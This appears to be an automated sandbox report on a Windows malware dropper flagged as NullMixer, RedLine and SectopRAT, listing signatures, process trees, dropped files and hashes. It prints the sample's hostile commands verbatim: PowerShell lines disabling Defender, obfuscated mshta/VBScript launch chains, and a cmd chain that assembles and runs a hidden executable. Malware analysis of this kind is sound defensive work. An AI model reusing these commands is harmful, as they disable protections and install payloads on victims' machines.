win10v2004-20241007-en

Max time kernel

79s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4124 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe
PID 1948 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2812 wrote to memory of 3852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 804 wrote to memory of 852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1948 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3968 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3520 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 4204 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 3644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 696 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1948 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4436 wrote to memory of 2728 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe
PID 3520 wrote to memory of 4152 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe
PID 3968 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe
PID 3272 wrote to memory of 5084 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe
PID 4376 wrote to memory of 1776 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe

Processes

C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe

"C:\Users\Admin\AppData\Local\Temp\043d28836fc545b0c6daf15ed47be4764ca9ad56d67ba58f84e348a773240b9f.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09ed6b36e57df5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0944361c3621a67a6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0900caa0501dc98f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed090db89ca4c58.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c4c0c3d01.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0983917533e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09d761ab4704dd931.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0968d19e5ec37794.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f69eef9c0d5b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09fbe3bf81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09755e77ed017e8af.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed091bab77a3bb62d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe

Wed09ed6b36e57df5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe

Wed0900caa0501dc98f.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1948 -ip 1948

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe

Wed0944361c3621a67a6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe

Wed090db89ca4c58.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe

Wed09755e77ed017e8af.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe

Wed0983917533e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe

Wed09d761ab4704dd931.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe

Wed09c4c0c3d01.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe

Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe

Wed091bab77a3bb62d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe

Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe

Wed09f69eef9c0d5b.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2232 -ip 2232

C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$602B8,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 356

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3HVL9.tmp\Wed09f69eef9c0d5b.tmp" /SL5="$90058,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -IM "Wed090db89ca4c58.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

Network


Files

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libcurl.dll

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libstdc++-6.dll

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed091bab77a3bb62d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0900caa0501dc98f.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed090db89ca4c58.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09c4c0c3d01.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0944361c3621a67a6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09f69eef9c0d5b.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0968d19e5ec37794.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09fbe3bf81.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09755e77ed017e8af.exe

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed0983917533e.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bq5afpt1.jus.ps1

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09d761ab4704dd931.exe

MD5 3bf8a169c55f8b54700880baee9099d7
SHA1 d411f875744aa2cfba6d239bad723cbff4cf771a
SHA256 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2
SHA512 f75ed04c077fdd12557a197f5a75d6cce64ef9a5e66e8714f0c80e234eb3ae5151c47f02d1baa98e43adcbbdf0d2016a9f2ba092f143f2ea1e1072ab0d194c11

memory/3852-90-0x0000000005E70000-0x0000000005ED6000-memory.dmp

memory/3852-89-0x0000000005E00000-0x0000000005E66000-memory.dmp

memory/1776-127-0x0000000000070000-0x00000000000E0000-memory.dmp

memory/3852-88-0x0000000005D60000-0x0000000005D82000-memory.dmp

memory/852-87-0x0000000073640000-0x0000000073DF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\Wed09ed6b36e57df5f.exe

MD5 91e3bed725a8399d72b182e5e8132524
SHA1 0f69cbbd268bae2a7aa2376dfce67afc5280f844
SHA256 18af3c7bdeb815af9abe9dcc4f524b2fb2a33ac9cc6784f31e302c10a8d09a0d
SHA512 280fe25f4813bc261dee3b38ad03364896f3b4f049dcf1d94c6c6e7abb09b47e06445746719d902281d04cc15879d745dd0b71a466fa31f952ae51f90360ae76

memory/3852-68-0x0000000073640000-0x0000000073DF0000-memory.dmp

memory/4516-126-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-EOSVR.tmp\Wed09f69eef9c0d5b.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2172-134-0x0000000004E30000-0x0000000004E4E000-memory.dmp

memory/4216-131-0x0000000000EC0000-0x0000000000F32000-memory.dmp

memory/3852-137-0x0000000006510000-0x000000000655C000-memory.dmp

memory/3852-136-0x00000000060B0000-0x00000000060CE000-memory.dmp

memory/2172-129-0x0000000004E60000-0x0000000004ED6000-memory.dmp

memory/2172-128-0x0000000000600000-0x0000000000670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-0SQKG.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2172-154-0x0000000005570000-0x0000000005B14000-memory.dmp

memory/3028-151-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1948-63-0x000000006494A000-0x000000006494F000-memory.dmp

memory/1948-60-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1948-61-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1948-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1948-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1948-57-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1948-56-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1948-55-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/1948-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1948-50-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC10AE4C7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
